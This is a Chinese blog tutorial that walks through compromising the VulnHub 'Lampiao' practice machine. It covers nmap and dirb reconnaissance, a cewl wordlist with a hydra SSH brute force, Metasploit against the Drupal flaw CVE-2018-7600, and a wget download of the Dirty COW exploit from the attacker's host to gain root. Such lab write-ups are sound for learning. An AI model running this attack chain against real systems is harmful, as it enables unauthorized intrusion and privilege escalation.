挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】

靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/

靶机难度:中等

工具:kalilinux; 一个灵活的脑子 ; 一双手

目标:得到root权限&找到flag.txt

作者:木木北星

声明:这里使用的技术仅用于学习交流目的,如果列出的技术用于其他任何目标,我概不负责。

第一步信息收集

信息收集在整个渗透过程中占80%左右。在虚拟机中确认攻击的ip地址,nmap获取目标ip地址(有很多工具我个人比较喜欢nmap)

使用命令:nmap -sP 192.168.222.0/24

解释:(ip地址是你自己的物理机ip第三个小数点后面改0/24)

得到ip后开始探索ip地址开放端口和一些服务。继续用nmap全端口扫描:

使用命令:nmap -sS -sV -T5 -A -p- 192.168.222.137

可以看出靶机上有三个可用的开放端口22、80、1898端口。这里对22端口,尝试ssh弱口令爆破,并没有结果,这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf、hydra等,后期文章攻击也会使用到。由于目标靶机上的端口80可用,我们在浏览器上打开了目标计算机的IP,它显示了一个有趣的页面:

F12 查看这是一个静态页面,没发现什么有用的信息所以换1898端口:

可以分别进入两个页面:

第一栏点进去内容翻译后并没有什么有效的信息,第二栏点进去细心的我发现了这是node/3,这是第三栏的内容,说明还有第二栏的内容没有显示,修改下页面试试。

发现两个文件:

第一个文件内是一个音频,语音内容为:user tiago,则用户名为:tiago

第二个文件是一个二维码,扫码后的内容是一句话:Try harder!Muahuahua...没用的信息

接下来开始用工具对网站进行爆破扫描...(也可以使用御剑)

使用命令: dirb http://192.168.222.137:1898 -o out

找到一个robots.txt的文件,后台打开看看:

经过漫长的信息收集终于在CHANGELOG.txt文件中发现了网站的基本信息

这是一个基于Drupal 7的博客或是社交网站。

cewl:通过爬行网站获取关键信息创建一个密码字典

hydra:神器九头蛇,网上有太多资料

使用命令:cewl http://192.168.222.137:1898/?q=node/1 -w mmbx.txt

hydra -l tiago -P mmbx.txt 192.168.222.137 ssh

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:

用户: tiago

密码: Virgulino

重要的来了!!!!使用用户名tiago进行ssh登陆连接,成功连接,但是不能用sudo su进行提权!!

第二部shell提权

现在利用收集到的信息进行提权

刚刚在文件收集到这个网站是2016年的Durpal7

这边我们查询到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透试试。

先输入指令:msfconsole

再search CVE-2018-7600

然后再use这个指令

rhosts设置靶机IP

rport设置靶机端口

run开跑

成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,这是另外一种渗透的方法,可以好好学习。

下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权目前已经修复,仅供参考学习。

命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp

思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上

命令:python -m http.server 8879 开启服务

网站登录端口(这里注意,ip地址是你kali的IP地址)

命令:wget http://192.168.222.128 :8879/40847.cpp

将40847.cp上传到靶机上

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

执行gcc编译可执行文件,可直接提权。

打开文件成功看到靶机root的密码

直接登录root

输入ls(列出目前工作目录所含之文件及子目录)

发现flag最后查看文件

最后:如果本人有哪些步骤没有做的精细的望大佬勿喷,本人也喜欢结实五湖四海的朋友一起探讨学习技术。

有兴趣的可以斯我

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值